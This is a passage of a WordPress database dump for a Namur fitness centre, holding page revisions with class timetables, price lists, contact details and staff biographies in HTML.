min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2015-04-21 08:50:51', '2015-04-21 08:50:51', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(469, 1, '2014-12-15 19:46:29', '2014-12-15 19:46:29', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">Heure</td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">16h45</td>\r\n<td class=\"tvide\" valign=\"center\">-</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">17h30</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcore\">Core</td>\r\n<td class=\"ttrx\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tvide\">18h15</td>\r\n<td class=\"tvide\">Réservé Squash</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tforce\">Force</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h00</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"ttrx\">TRX</td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">19h45</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tcircuit\">Circuit Training</td>\r\n<td class=\"tvide\">Réservé Foot</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tvide\">20h30</td>\r\n<td class=\"tvide\">-</td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\"><center><img class=\"alignnone size-full wp-image-464\" alt=\"LesMills\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/LesMills1.png\" width=\"130\"/></center></td>\r\n<td class=\"tvide\">Duo Training</td>\r\n<td class=\"tvide\">-</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #9FEDAC;\">Circuit Training</span> : Entraînement sur un circuit ultra complet, fun et adapté à votre niveau. Ce circuit utilise tous les outils.\r\n\r\n<span style=\"text-decoration: underline; background: #EDE99F;\">TRX</span> : Entraînement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l’intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #ED9FA2;\">Force</span> : Entraînement basé sur le travail de la force pure avec ou sans prise de masse (Kettlebel, barre, haltère,…)<b> </b>\r\n\r\n<span style=\"text-decoration: underline; background: #A2A186;\">Core</span> : Entraînement basé sur le travail du centre du corps (« core »). Nous enchaînerons les exercices sur les muscles abdominaux, dorsaux, fessiers,…\r\n\r\n&nbsp;\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Séance Booster</td>\r\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\r\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Personal Training</td>\r\n<td class=\"tcelluleprix\">60 min : 60.00€\r\n30 min : 35.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Duo Training</td>\r\n<td class=\"tcelluleprix\">60 min : 35.00€\r\n30 min : 20.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Small Group Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 10.00€\r\n1 carte de 10 séances : 90.00€ (valable 6 mois)\r\n1 carte de 20 séances : 150.00€ (valable 6 mois)\r\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Préparation physique</td>\r\n<td class=\"tcelluleprix\">1 séance : 40.00€\r\nSéance de 30 min orientée sur les spécificités du sport</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-12-15 19:46:29', '2014-12-15 19:46:29', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(471, 1, '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 'Séances', '', 'publish', 'open', 'open', '', 'seances', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=471', 4, 'nav_menu_item', '', 0),
(477, 1, '2015-04-21 09:07:44', '2015-04-21 09:07:44', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes réservations de Team Training se font en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\nLes séances de Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2015-04-21 09:07:44', '2015-04-21 09:07:44', '', 9, 'http://www.crosstrainingcenter.be/9-revision-v1/', 0, 'revision', '', 0),
(481, 1, '2015-04-21 09:46:39', '2015-04-21 09:46:39', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n        <li>Formation Personal Trainer (Parnasse)</li>\r\n	<li>Formation Les mills Coach BodyBoxe</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2015-04-21 09:46:39', '2015-04-21 09:46:39', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(480, 1, '2015-04-21 09:40:45', '2015-04-21 09:40:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALLUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2015-04-21 09:40:45', '2015-04-21 09:40:45', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(484, 1, '2015-04-21 10:03:23', '2015-04-21 10:03:23', '', 'map', '', 'inherit', 'open', 'open', '', 'map', '', '', '2015-04-21 10:03:23', '2015-04-21 10:03:23', '', 0, 'http://www.crosstrainingcenter.be/wp-content/uploads/2015/04/map.png', 0, 'attachment', 'image/png', 0),
(485, 1, '2015-04-22 07:38:04', '2015-04-22 07:38:04', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n\n<div align=\"center\">\n\nPrésentation du Cross Training Namur\n\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\n<iframe src=\"//www.youtube.com/embed/z_jNG_jQ8gU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\n\n</div>\n\n</div></td>\n\n</tr>\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-autosave-v1', '', '', '2015-04-22 07:38:04', '2015-04-22 07:38:04', '', 369, 'http://www.crosstrainingcenter.be/369-autosave-v1/', 0, 'revision', '', 0),
(486, 1, '2015-04-22 07:38:29', '2015-04-22 07:38:29', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/_os-BkWwGKU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n<iframe src=\"//www.youtube.com/embed/v=dgKynOMF_HI\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-revision-v1', '', '', '2015-04-22 07:38:29', '2015-04-22 07:38:29', '', 369, 'http://www.crosstrainingcenter.be/369-revision-v1/', 0, 'revision', '', 0),
(487, 1, '2015-04-22 07:39:30', '2015-04-22 07:39:30', '<h1>Retrouvez ici les vidéos illustrant le déroulements des séances</h1>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<div align=\"center\">\r\n\r\nPrésentation du Cross Training Namur\r\n\r\n<iframe src=\"//www.youtube.com/embed/_os-BkWwGKU\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n<iframe src=\"//www.youtube.com/embed/dgKynOMF_HI\" height=\"225\" width=\"300\" allowfullscreen=\"\" frameborder=\"0\"></iframe>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'En images', '', 'inherit', 'open', 'open', '', '369-revision-v1', '', '', '2015-04-22 07:39:30', '2015-04-22 07:39:30', '', 369, 'http://www.crosstrainingcenter.be/369-revision-v1/', 0, 'revision', '', 0),
(490, 3, '2015-09-02 17:07:45', '2015-09-02 17:07:45', '<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\"><img class=\"alignnone size-full wp-image-494\" alt=\"nouvelles seances CT\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png\" width=\"900\" height=\"635\" /></a>\n\n\n<h1></h1>\n<h2>Réservation des séances :</h2>\nRéserver vos séances de Small Group Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\n<h1></h1>\n<h2>Duo Training:</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nEntrainements à deux personnes sous la supervision d’un coach.\n<h1></h1>\n<h2>Personal Training:</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nUn coach par personne, l’idéal pour progresser plus rapidement!\n<h1></h1>\n<h2>Coaching nutritionnel:</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\nRendez-vous avec une diététicienne pour améliorer votre santé.\n<h1></h1>\n<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Séance Booster</td>\n<td class=\"tcelluleprix\">20.00€ (Sur rendez-vous)\n30 min : 10 min de bilan + 20 min de découverte avec un coach en personal training</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Personal Training</td>\n<td class=\"tcelluleprix\">60 min : 60.00€\n30 min : 35.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Duo Training</td>\n<td class=\"tcelluleprix\">60 min : 35.00€\n30 min : 20.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Small Group Training</td>\n<td class=\"tcelluleprix\">1 séance : 10.00€\n1 carte de 10 séances : 90.00€ (valable 6 mois)\n1 carte de 20 séances : 150.00€ (valable 6 mois)\n1 carte de 50 séances : 300.00€ (valable 1 an)</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Préparation physique</td>\n<td class=\"tcelluleprix\">1 séance : 40.00€\nSéance de 30 min orientée sur les spécificités du sport</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + coaching nutritionnel pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-autosave-v1', '', '', '2015-09-02 17:07:45', '2015-09-02 17:07:45', '', 363, 'http://www.crosstrainingcenter.be/363-autosave-v1/', 0, 'revision', '', 0),
(491, 3, '2015-09-02 16:56:52', '2015-09-02 16:56:52', '', 'Capture d’écran 2015-09-02 à 18.56.23', '', 'inherit', 'open', 'open', '', 'capture-decran-2015-09-02-a-18-56-23', '', '', '2015-09-02 16:56:52', '2015-09-02 16:56:52', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/Capture-d’écran-2015-09-02-à-18.56.23.png', 0, 'attachment', 'image/png', 0),
